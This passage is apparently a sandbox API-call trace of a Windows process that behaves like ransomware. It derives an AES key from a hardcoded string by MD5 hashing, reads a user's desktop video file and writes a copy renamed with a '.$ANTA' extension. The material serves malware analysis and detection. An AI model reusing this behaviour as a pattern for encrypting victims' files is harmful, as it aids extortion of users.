CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0124.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0124.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e27e8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0124.060] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0124.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0124.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2728, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0124.060] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0124.060] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0124.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0124.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca958, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0124.060] CryptHashData (hHash=0x41ac180, pbData=0x17e2848, dwDataLen=0x22, dwFlags=0x1) returned 1 [0124.060] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0124.060] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0124.060] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0124.061] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0124.061] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca7f0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0124.061] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac180, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac600) returned 1 [0124.061] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0124.061] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0124.061] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0124.061] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1797028, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0124.061] CryptDestroyHash (hHash=0x41ac180) returned 1 [0124.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0124.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e8ab0 [0124.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0124.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0124.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0124.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0124.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0124.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0124.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0124.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0124.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0124.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0124.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0124.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0124.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0124.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0124.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0124.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0124.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0124.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0124.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9128 [0124.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0124.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0124.062] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0124.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0124.062] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0124.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0124.062] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0124.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0124.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0124.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0124.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0124.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0124.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0124.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0124.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0124.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0124.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0124.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eb450 [0124.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0124.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0124.063] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\LdhR.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\ldhr.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0124.063] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0124.063] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0124.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0124.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0124.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0124.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0124.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0124.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0124.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0124.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0124.063] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0124.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0124.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0124.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0124.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0124.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0124.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0124.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0124.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0124.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0124.063] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0124.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0124.064] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0124.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0124.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0124.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0124.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0124.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0124.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0124.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0124.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0124.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0124.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0124.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0124.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0124.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0124.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0124.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0124.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0124.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0124.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0124.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0124.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0124.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0124.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0124.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0124.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0124.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0124.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0124.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0124.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0124.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369dc8 [0124.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0124.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43921f0 [0124.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0124.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392340 [0124.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369dc8 | out: hHeap=0x1780000) returned 1 [0124.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0124.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0124.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0124.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0124.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0124.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43921f0 | out: hHeap=0x1780000) returned 1 [0124.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0124.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0124.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0124.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0124.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0124.066] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0124.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0124.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0124.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392340 | out: hHeap=0x1780000) returned 1 [0124.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0124.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0124.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0124.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0124.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x499a008 [0124.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0124.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0124.067] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\LdhR.mkv.$ANTA" (normalized: "c:\\users\\fd1hvy\\desktop\\ldhr.mkv.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0124.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0124.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0124.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0124.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0124.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0124.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0124.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0124.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0124.068] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0124.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0124.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0124.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0124.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0124.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0124.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0124.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0124.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0124.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0124.068] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0124.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0124.068] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0124.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac100 [0124.068] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0124.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0124.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0124.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0124.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0124.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0124.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0124.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0124.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0124.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0124.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0124.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0124.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0124.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0124.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0124.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0124.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e08020 [0124.071] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0124.071] ReadFile (in: hFile=0x258, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x4550, lpOverlapped=0x0) returned 1 [0124.073] ReadFile (in: hFile=0x258, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0124.073] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0124.073] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0124.073] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0124.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0124.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4550) returned 0x49aa010 [0124.073] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e08020 | out: hHeap=0x1780000) returned 1 [0124.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0124.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0124.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0124.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0124.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0124.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4550) returned 0x49ae568 [0124.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0124.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0124.076] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0124.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0124.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0124.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0124.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0124.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0124.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4550) returned 0x49aa010 [0124.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0124.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0124.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0124.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0124.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0124.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0124.076] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0124.076] RtlAllocateHeap (HeapHandle=0x1780000, 